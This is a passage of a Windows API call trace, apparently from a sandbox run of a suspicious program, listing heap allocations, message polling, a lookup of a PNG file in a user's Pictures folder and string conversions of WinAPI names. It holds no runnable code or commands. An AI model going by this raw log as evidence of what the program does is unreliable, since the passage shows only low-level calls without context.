Flags=0x0, Size=0xb0) returned 0x42da858 [0093.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0093.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0093.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0093.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0e8 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0093.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0093.588] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0093.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0093.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0093.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0093.589] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0093.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.589] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea366e0, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xfb8a48f0, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0xfb8a48f0, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x4807, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="EWWH.png", cAlternateFileName="")) returned 0x41ac640 [0093.589] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0093.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0093.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0093.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0093.590] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0093.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0093.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0093.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ed8 [0093.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0093.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0093.591] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0093.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0093.591] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0093.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0093.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0093.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0093.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0093.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f38 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0093.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0093.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0093.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0093.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0093.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0093.594] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0093.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0093.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0093.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.598] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, 